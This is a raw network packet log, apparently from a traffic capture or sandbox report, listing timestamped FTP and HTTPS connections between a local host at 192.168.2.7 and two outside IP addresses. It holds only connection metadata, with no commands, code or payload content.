Oct 4, 2024 10:41:10.078142881 CEST	21	49700	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:10.078233957 CEST	49700	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:10.691214085 CEST	21	49700	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:10.691467047 CEST	49700	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:10.696376085 CEST	21	49700	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:10.912194014 CEST	21	49700	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:10.912406921 CEST	49700	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:10.917347908 CEST	21	49700	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:11.197617054 CEST	21	49700	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:11.197840929 CEST	49700	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:11.202744007 CEST	21	49700	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:11.423341036 CEST	21	49700	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:11.423626900 CEST	49700	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:11.428808928 CEST	21	49700	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:11.644280910 CEST	21	49700	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:11.652342081 CEST	49700	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:11.657196999 CEST	21	49700	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:11.873224020 CEST	21	49700	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:11.874077082 CEST	49700	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:11.879277945 CEST	21	49700	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:12.325442076 CEST	21	49700	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:12.325537920 CEST	21	49700	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:12.325633049 CEST	49700	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:12.337893009 CEST	49701	52560	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:12.344609976 CEST	52560	49701	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:12.344712019 CEST	49701	52560	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:12.348578930 CEST	49700	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:12.354408026 CEST	21	49700	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:12.960972071 CEST	21	49700	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:12.961239100 CEST	49701	52560	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:12.961330891 CEST	49701	52560	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:12.966392040 CEST	52560	49701	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:12.966990948 CEST	52560	49701	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:12.967062950 CEST	49701	52560	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:13.006335974 CEST	49700	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:13.182835102 CEST	21	49700	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:13.225099087 CEST	49700	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:17.114437103 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:17.114490986 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:17.114576101 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:17.119324923 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:17.119338036 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:17.655690908 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:17.655888081 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:17.658962011 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:17.658989906 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:17.659324884 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:17.709470987 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:17.719734907 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:17.763432026 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:17.843213081 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:17.843276024 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:17.843297005 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:17.843349934 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:17.843373060 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:17.843406916 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:17.866709948 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:17.866792917 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:17.866807938 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:17.912604094 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:17.930273056 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:17.930298090 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:17.930314064 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:17.930341005 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:17.930432081 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:17.931504965 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:17.931524038 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:17.931539059 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:17.931562901 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:17.931610107 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:17.932631969 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:17.932650089 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:17.932684898 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:17.932739973 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:17.954054117 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:17.954071045 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:17.954138994 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.018117905 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.018131971 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.018287897 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.018285990 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.018321037 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.018381119 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.019208908 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.019247055 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.019258022 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.019277096 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.019319057 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.019488096 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.019550085 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.020334005 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.020395041 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.021246910 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.021306038 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.022339106 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.022403002 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.041552067 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.041640043 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.106156111 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.106281042 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.106312990 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.106340885 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.106369972 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.106379032 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.106657982 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.106731892 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.106791019 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.106858015 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.107637882 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.107705116 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.107754946 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.107831955 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.108544111 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.108607054 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.108752012 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.108819962 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.109482050 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.109556913 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.110060930 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.110173941 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.110342979 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.110419035 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.110480070 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.110572100 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.111375093 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.111454010 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.129203081 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.129293919 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.175970078 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.176062107 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.193526983 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.193615913 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.193798065 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.193881989 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.193942070 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.194011927 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.194056034 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.194132090 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.194358110 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.194430113 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.194617987 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.194693089 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.194947958 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.195024967 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.195067883 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.195143938 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.195502043 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.195571899 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.199309111 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.199414015 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.199464083 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.199539900 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.199759960 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.199831963 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.199975014 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.200038910 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.200382948 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.200453043 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.210644007 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.210697889 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.217021942 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.217124939 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.263622046 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.263736963 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.280860901 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.280951023 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.281117916 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.281189919 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.281279087 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.281356096 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.281461000 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.281527996 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.281860113 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.281940937 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.282265902 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.282332897 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.282387018 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.282449961 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.282973051 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.283044100 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.283298969 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.283371925 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.283529043 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.283591986 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.283708096 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.283771992 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.283844948 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.283905983 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.284260035 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.284327984 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.284429073 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.284491062 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.306721926 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.306885004 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.351892948 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.351998091 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.368431091 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.368580103 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.368633032 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.368657112 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.368690014 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.368710995 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.368899107 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.368969917 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.369138002 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.369210958 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.369373083 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.369440079 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.369764090 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.369826078 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.369853973 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.369923115 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.370151997 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.370228052 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.370596886 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.370663881 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.370934010 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.371001959 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.371097088 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.371164083 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.371196032 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.371262074 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.371876955 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.371953011 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.371984005 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.372061968 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.392045021 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.392141104 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.395251989 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.395349979 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.439172983 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.439294100 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.455791950 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.455884933 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.456139088 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.456212044 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.456379890 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.456443071 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.456604004 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.456674099 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.456896067 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.456958055 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.457227945 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.457290888 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.457402945 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.457468987 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.458055973 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.458127975 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.458234072 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.458316088 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.458425999 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.458501101 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.458714962 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.458791018 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.458928108 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.459088087 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.459120989 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.459139109 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.459170103 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.459189892 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.460218906 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.460318089 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.460402012 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.460464954 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.482706070 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.482816935 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.526448011 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.526546955 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.543445110 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.543530941 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.543709040 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.543777943 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.543911934 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.543977976 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.544109106 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.544177055 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.544338942 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.544403076 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.544579029 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.544647932 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.544787884 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.544852018 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.545130014 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.545192003 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.545377970 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.545440912 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.545533895 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.545595884 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.545746088 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.545805931 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.545895100 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.545964956 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.546230078 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.546335936 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.546405077 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.546468019 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.570508003 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.570607901 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.614391088 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.614469051 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.631316900 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.631402016 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.631464005 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.631526947 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.631885052 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.631953955 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.632071018 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.632136106 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.632389069 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.632458925 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.632755041 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.632836103 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.633196115 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.633276939 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.633315086 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.633378029 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.633409977 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.633471966 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.633528948 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.633584023 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.633605957 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.633660078 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.633667946 CEST	443	49718	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:18.633718967 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:18.650464058 CEST	49718	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:21.437822104 CEST	49740	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:21.442784071 CEST	21	49740	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:21.442851067 CEST	49740	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:21.989883900 CEST	49700	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:22.059770107 CEST	21	49740	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:22.060616970 CEST	49740	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:22.065522909 CEST	21	49740	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:22.280162096 CEST	21	49740	5.2.84.236	192.168.2.7
